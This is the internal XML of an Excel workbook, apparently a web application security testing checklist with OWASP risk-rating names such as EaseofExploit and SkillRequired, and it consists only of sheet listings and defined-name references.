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/Users/zeq3ul/Desktop/eLS Lab/Web Lab/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{1D66EFB9-7DC9-42E7-88CE-FFECEA6EB1CE}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="460" windowWidth="51200" windowHeight="20180" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="1" sheetId="3" r:id="rId1"/>
    <sheet name="2" sheetId="4" r:id="rId2"/>
    <sheet name="3" sheetId="5" r:id="rId3"/>
    <sheet name="4" sheetId="6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3" r:id="rId11"/>
    <sheet name="12" sheetId="17" r:id="rId12"/>
    <sheet name="WSTG-CWE" sheetId="22" r:id="rId13"/>
    <sheet name="Summary Issue" sheetId="14" r:id="rId14"/>
    <sheet name="Risk Assessment Calculator" sheetId="20" r:id="rId15"/>
    <sheet name="References" sheetId="19" r:id="rId16"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId17"/>
    <externalReference r:id="rId18"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'1'!$A$3:$J$14</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="9" hidden="1">'10'!$A$3:$J$13</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="10" hidden="1">'11'!$A$3:$J$16</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="11" hidden="1">'12'!$A$3:$J$5</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'2'!$A$3:$J$11</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'3'!$A$3:$J$9</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'4'!$A$3:$J$14</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'5'!$A$3:$J$8</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'6'!$A$3:$J$12</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'7'!$A$3:$J$20</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'8'!$A$3:$K$6</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'9'!$A$3:$J$7</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="13" hidden="1">'Summary Issue'!$A$3:$I$4</definedName>
    <definedName name="asdad" localSheetId="0">#REF!</definedName>
    <definedName name="asdad" localSheetId="9">#REF!</definedName>
    <definedName name="asdad" localSheetId="10">#REF!</definedName>
    <definedName name="asdad" localSheetId="11">#REF!</definedName>
    <definedName name="asdad" localSheetId="1">#REF!</definedName>
    <definedName name="asdad" localSheetId="2">#REF!</definedName>
    <definedName name="asdad" localSheetId="3">#REF!</definedName>
    <definedName name="asdad" localSheetId="4">#REF!</definedName>
    <definedName name="asdad" localSheetId="5">#REF!</definedName>
    <definedName name="asdad" localSheetId="6">#REF!</definedName>
    <definedName name="asdad" localSheetId="7">#REF!</definedName>
    <definedName name="asdad" localSheetId="8">#REF!</definedName>
    <definedName name="asdad" localSheetId="13">#REF!</definedName>
    <definedName name="asdad">#REF!</definedName>
    <definedName name="Awareness" localSheetId="0">#REF!</definedName>
    <definedName name="Awareness" localSheetId="9">#REF!</definedName>
    <definedName name="Awareness" localSheetId="10">#REF!</definedName>
    <definedName name="Awareness" localSheetId="11">#REF!</definedName>
    <definedName name="Awareness" localSheetId="1">#REF!</definedName>
    <definedName name="Awareness" localSheetId="2">#REF!</definedName>
    <definedName name="Awareness" localSheetId="3">#REF!</definedName>
    <definedName name="Awareness" localSheetId="4">#REF!</definedName>
    <definedName name="Awareness" localSheetId="5">#REF!</definedName>
    <definedName name="Awareness" localSheetId="6">#REF!</definedName>
    <definedName name="Awareness" localSheetId="7">#REF!</definedName>
    <definedName name="Awareness" localSheetId="8">#REF!</definedName>
    <definedName name="Awareness" localSheetId="15">References!$M$3:$M$7</definedName>
    <definedName name="Awareness" localSheetId="14">References!$M$3:$M$7</definedName>
    <definedName name="Awareness" localSheetId="13">#REF!</definedName>
    <definedName name="Awareness">#REF!</definedName>
    <definedName name="BASE">[1]Dashboard!$D$14</definedName>
    <definedName name="BASE_URL">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="0">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="9">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="10">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="11">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="1">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="2">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="3">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="4">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="5">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="6">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="7">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="8">#REF!</definedName>
    <definedName name="dfhuilo" localSheetId="13">#REF!</definedName>
    <definedName name="dfhuilo">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="0">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="9">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="10">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="11">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="1">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="2">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="3">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="4">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="5">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="6">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="7">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="8">#REF!</definedName>
    <definedName name="EaseofExploit" localSheetId="15">References!$K$3:$K$7</definedName>
    <definedName name="EaseofExploit" localSheetId="14">References!$K$3:$K$7</definedName>
    <definedName name="EaseofExploit" localSheetId="13">#REF!</definedName>
    <definedName name="EaseofExploit">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="0">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="9">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="10">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="11">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="1">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="2">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="3">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="4">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="5">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="6">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="7">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="8">#REF!</definedName>
    <definedName name="EasyofDiscovery" localSheetId="15">References!$I$3:$I$7</definedName>
    <definedName name="EasyofDiscovery" localSheetId="14">References!$I$3:$I$7</definedName>
    <definedName name="EasyofDiscovery" localSheetId="13">#REF!</definedName>
    <definedName name="EasyofDiscovery">#REF!</definedName>
    <definedName name="etrtr" localSheetId="0">#REF!</definedName>
    <definedName name="etrtr" localSheetId="9">#REF!</definedName>
    <definedName name="etrtr" localSheetId="10">#REF!</definedName>
    <definedName name="etrtr" localSheetId="11">#REF!</definedName>
    <definedName name="etrtr" localSheetId="1">#REF!</definedName>
    <definedName name="etrtr" localSheetId="2">#REF!</definedName>
    <definedName name="etrtr" localSheetId="3">#REF!</definedName>
    <definedName name="etrtr" localSheetId="4">#REF!</definedName>
    <definedName name="etrtr" localSheetId="5">#REF!</definedName>
    <definedName name="etrtr" localSheetId="6">#REF!</definedName>
    <definedName name="etrtr" localSheetId="7">#REF!</definedName>
    <definedName name="etrtr" localSheetId="8">#REF!</definedName>
    <definedName name="etrtr" localSheetId="13">#REF!</definedName>
    <definedName name="etrtr">#REF!</definedName>
    <definedName name="ffff" localSheetId="0">#REF!</definedName>
    <definedName name="ffff" localSheetId="9">#REF!</definedName>
    <definedName name="ffff" localSheetId="10">#REF!</definedName>
    <definedName name="ffff" localSheetId="11">#REF!</definedName>
    <definedName name="ffff" localSheetId="1">#REF!</definedName>
    <definedName name="ffff" localSheetId="2">#REF!</definedName>
    <definedName name="ffff" localSheetId="3">#REF!</definedName>
    <definedName name="ffff" localSheetId="4">#REF!</definedName>
    <definedName name="ffff" localSheetId="5">#REF!</definedName>
    <definedName name="ffff" localSheetId="6">#REF!</definedName>
    <definedName name="ffff" localSheetId="7">#REF!</definedName>
    <definedName name="ffff" localSheetId="8">#REF!</definedName>
    <definedName name="ffff" localSheetId="13">#REF!</definedName>
    <definedName name="ffff">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="0">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="9">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="10">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="11">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="1">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="2">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="3">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="4">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="5">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="6">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="7">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="8">#REF!</definedName>
    <definedName name="FinancialDamage" localSheetId="15">References!$I$12:$I$16</definedName>
    <definedName name="FinancialDamage" localSheetId="14">References!$I$12:$I$16</definedName>
    <definedName name="FinancialDamage" localSheetId="13">#REF!</definedName>
    <definedName name="FinancialDamage">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="0">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="9">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="10">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="11">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="1">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="2">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="3">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="4">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="5">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="6">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="7">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="8">#REF!</definedName>
    <definedName name="gtrgtr" localSheetId="13">#REF!</definedName>
    <definedName name="gtrgtr">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="0">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="9">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="10">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="11">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="1">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="2">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="3">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="4">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="5">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="6">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="7">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="8">#REF!</definedName>
    <definedName name="IntrusionDetection" localSheetId="15">References!$O$3:$O$7</definedName>
    <definedName name="IntrusionDetection" localSheetId="14">References!$O$3:$O$7</definedName>
    <definedName name="IntrusionDetection" localSheetId="13">#REF!</definedName>
    <definedName name="IntrusionDetection">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="0">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="9">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="10">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="11">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="1">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="2">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="3">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="4">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="5">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="6">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="7">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="8">#REF!</definedName>
    <definedName name="LossofAccountability" localSheetId="15">References!$G$12:$G$15</definedName>
    <definedName name="LossofAccountability" localSheetId="14">References!$G$12:$G$15</definedName>
    <definedName name="LossofAccountability" localSheetId="13">#REF!</definedName>
    <definedName name="LossofAccountability">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="0">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="9">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="10">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="11">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="1">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="2">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="3">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="4">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="5">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="6">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="7">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="8">#REF!</definedName>
    <definedName name="LossofAvailability" localSheetId="15">References!$E$12:$E$16</definedName>
    <definedName name="LossofAvailability" localSheetId="14">References!$E$12:$E$16</definedName>
    <definedName name="LossofAvailability" localSheetId="13">#REF!</definedName>
    <definedName name="LossofAvailability">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="0">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="9">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="10">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="11">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="1">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="2">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="3">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="4">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="5">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="6">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="7">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="8">#REF!</definedName>
    <definedName name="LossofConfidentiality" localSheetId="15">References!$A$12:$A$16</definedName>
    <definedName name="LossofConfidentiality" localSheetId="14">References!$A$12:$A$16</definedName>
    <definedName name="LossofConfidentiality" localSheetId="13">#REF!</definedName>
    <definedName name="LossofConfidentiality">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="0">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="9">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="10">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="11">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="1">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="2">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="3">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="4">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="5">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="6">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="7">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="8">#REF!</definedName>
    <definedName name="LossofIntegrity" localSheetId="15">References!$C$12:$C$17</definedName>
    <definedName name="LossofIntegrity" localSheetId="14">References!$C$12:$C$17</definedName>
    <definedName name="LossofIntegrity" localSheetId="13">#REF!</definedName>
    <definedName name="LossofIntegrity">#REF!</definedName>
    <definedName name="MASVS_VERSION" localSheetId="13">#REF!</definedName>
    <definedName name="MASVS_VERSION">#REF!</definedName>
    <definedName name="Motive" localSheetId="0">#REF!</definedName>
    <definedName name="Motive" localSheetId="9">#REF!</definedName>
    <definedName name="Motive" localSheetId="10">#REF!</definedName>
    <definedName name="Motive" localSheetId="11">#REF!</definedName>
    <definedName name="Motive" localSheetId="1">#REF!</definedName>
    <definedName name="Motive" localSheetId="2">#REF!</definedName>
    <definedName name="Motive" localSheetId="3">#REF!</definedName>
    <definedName name="Motive" localSheetId="4">#REF!</definedName>
    <definedName name="Motive" localSheetId="5">#REF!</definedName>
    <definedName name="Motive" localSheetId="6">#REF!</definedName>
    <definedName name="Motive" localSheetId="7">#REF!</definedName>
    <definedName name="Motive" localSheetId="8">#REF!</definedName>
    <definedName name="Motive" localSheetId="15">References!$C$3:$C$6</definedName>
    <definedName name="Motive" localSheetId="14">References!$C$3:$C$6</definedName>
    <definedName name="Motive" localSheetId="13">#REF!</definedName>
    <definedName name="Motive">#REF!</definedName>
    <definedName name="MSTG_VERSION" localSheetId="13">#REF!</definedName>
    <definedName name="MSTG_VERSION">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="0">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="9">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="10">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="11">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="1">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="2">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="3">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="4">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="5">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="6">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="7">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="8">#REF!</definedName>
    <definedName name="NonCompliance" localSheetId="15">References!$M$12:$M$15</definedName>
    <definedName name="NonCompliance" localSheetId="14">References!$M$12:$M$15</definedName>
    <definedName name="NonCompliance" localSheetId="13">#REF!</definedName>
    <definedName name="NonCompliance">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="0">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="9">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="10">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="11">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="1">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="2">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="3">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="4">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="5">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="6">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="7">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="8">#REF!</definedName>
    <definedName name="OpenRedirect" localSheetId="13">#REF!</definedName>
    <definedName name="OpenRedirect">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="0">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="9">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="10">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="11">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="1">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="2">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="3">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="4">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="5">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="6">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="7">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="8">#REF!</definedName>
    <definedName name="OpenRedirect23" localSheetId="13">#REF!</definedName>
    <definedName name="OpenRedirect23">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="0">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="9">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="10">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="11">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="1">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="2">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="3">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="4">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="5">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="6">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="7">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="8">#REF!</definedName>
    <definedName name="opoiopo" localSheetId="13">#REF!</definedName>
    <definedName name="opoiopo">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="0">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="9">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="10">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="11">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="1">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="2">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="3">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="4">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="5">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="6">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="7">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="8">#REF!</definedName>
    <definedName name="Opportunity" localSheetId="15">References!$E$3:$E$6</definedName>
    <definedName name="Opportunity" localSheetId="14">References!$E$3:$E$6</definedName>
    <definedName name="Opportunity" localSheetId="13">#REF!</definedName>
    <definedName name="Opportunity">#REF!</definedName>
    <definedName name="piouioi" localSheetId="0">#REF!</definedName>
    <definedName name="piouioi" localSheetId="9">#REF!</definedName>
    <definedName name="piouioi" localSheetId="10">#REF!</definedName>
    <definedName name="piouioi" localSheetId="11">#REF!</definedName>
    <definedName name="piouioi" localSheetId="1">#REF!</definedName>
    <definedName name="piouioi" localSheetId="2">#REF!</definedName>
    <definedName name="piouioi" localSheetId="3">#REF!</definedName>
    <definedName name="piouioi" localSheetId="4">#REF!</definedName>
    <definedName name="piouioi" localSheetId="5">#REF!</definedName>
    <definedName name="piouioi" localSheetId="6">#REF!</definedName>
    <definedName name="piouioi" localSheetId="7">#REF!</definedName>
    <definedName name="piouioi" localSheetId="8">#REF!</definedName>
    <definedName name="piouioi" localSheetId="13">#REF!</definedName>
    <definedName name="piouioi">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="0">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="9">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="10">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="11">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="1">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="2">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="3">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="4">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="5">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="6">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="7">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="8">#REF!</definedName>
    <definedName name="PolicyViolation" localSheetId="15">References!$O$12:$O$16</definedName>
    <definedName name="PolicyViolation" localSheetId="14">References!$O$12:$O$16</definedName>
    <definedName name="PolicyViolation" localSheetId="13">#REF!</definedName>
    <definedName name="PolicyViolation">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="0">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="9">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="10">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="11">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="1">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="2">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="3">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="4">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="5">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="6">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="7">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="8">#REF!</definedName>
    <definedName name="PopulationSize" localSheetId="15">References!$G$3:$G$8</definedName>
    <definedName name="PopulationSize" localSheetId="14">References!$G$3:$G$8</definedName>
    <definedName name="PopulationSize" localSheetId="13">#REF!</definedName>
    <definedName name="PopulationSize">#REF!</definedName>
    <definedName name="qweqw" localSheetId="0">#REF!</definedName>
    <definedName name="qweqw" localSheetId="9">#REF!</definedName>
    <definedName name="qweqw" localSheetId="10">#REF!</definedName>
    <definedName name="qweqw" localSheetId="11">#REF!</definedName>
    <definedName name="qweqw" localSheetId="1">#REF!</definedName>
    <definedName name="qweqw" localSheetId="2">#REF!</definedName>
    <definedName name="qweqw" localSheetId="3">#REF!</definedName>
    <definedName name="qweqw" localSheetId="4">#REF!</definedName>
    <definedName name="qweqw" localSheetId="5">#REF!</definedName>
    <definedName name="qweqw" localSheetId="6">#REF!</definedName>
    <definedName name="qweqw" localSheetId="7">#REF!</definedName>
    <definedName name="qweqw" localSheetId="8">#REF!</definedName>
    <definedName name="qweqw" localSheetId="13">#REF!</definedName>
    <definedName name="qweqw">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="0">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="9">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="10">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="11">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="1">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="2">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="3">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="4">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="5">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="6">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="7">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="8">#REF!</definedName>
    <definedName name="ReputationDamage" localSheetId="15">References!$K$12:$K$16</definedName>
    <definedName name="ReputationDamage" localSheetId="14">References!$K$12:$K$16</definedName>
    <definedName name="ReputationDamage" localSheetId="13">#REF!</definedName>
    <definedName name="ReputationDamage">#REF!</definedName>
    <definedName name="result" localSheetId="0">#REF!</definedName>
    <definedName name="result" localSheetId="9">#REF!</definedName>
    <definedName name="result" localSheetId="10">#REF!</definedName>
    <definedName name="result" localSheetId="11">#REF!</definedName>
    <definedName name="result" localSheetId="1">#REF!</definedName>
    <definedName name="result" localSheetId="2">#REF!</definedName>
    <definedName name="result" localSheetId="3">#REF!</definedName>
    <definedName name="result" localSheetId="4">#REF!</definedName>
    <definedName name="result" localSheetId="5">#REF!</definedName>
    <definedName name="result" localSheetId="6">#REF!</definedName>
    <definedName name="result" localSheetId="7">#REF!</definedName>
    <definedName name="result" localSheetId="8">#REF!</definedName>
    <definedName name="result" localSheetId="15">#REF!</definedName>
    <definedName name="result" localSheetId="13">#REF!</definedName>
    <definedName name="result">#REF!</definedName>
    <definedName name="sdsd" localSheetId="0">#REF!</definedName>
    <definedName name="sdsd" localSheetId="9">#REF!</definedName>
    <definedName name="sdsd" localSheetId="10">#REF!</definedName>
    <definedName name="sdsd" localSheetId="11">#REF!</definedName>
    <definedName name="sdsd" localSheetId="1">#REF!</definedName>
    <definedName name="sdsd" localSheetId="2">#REF!</definedName>
    <definedName name="sdsd" localSheetId="3">#REF!</definedName>
    <definedName name="sdsd" localSheetId="4">#REF!</definedName>
    <definedName name="sdsd" localSheetId="5">#REF!</definedName>
    <definedName name="sdsd" localSheetId="6">#REF!</definedName>
    <definedName name="sdsd" localSheetId="7">#REF!</definedName>
    <definedName name="sdsd" localSheetId="8">#REF!</definedName>
    <definedName name="sdsd" localSheetId="13">#REF!</definedName>
    <definedName name="sdsd">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="0">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="9">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="10">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="11">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="1">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="2">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="3">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="4">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="5">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="6">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="7">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="8">#REF!</definedName>
    <definedName name="SkillRequired" localSheetId="15">References!$A$3:$A$8</definedName>
    <definedName name="SkillRequired" localSheetId="14">References!$A$3:$A$8</definedName>
    <definedName name="SkillRequired" localSheetId="13">#REF!</definedName>
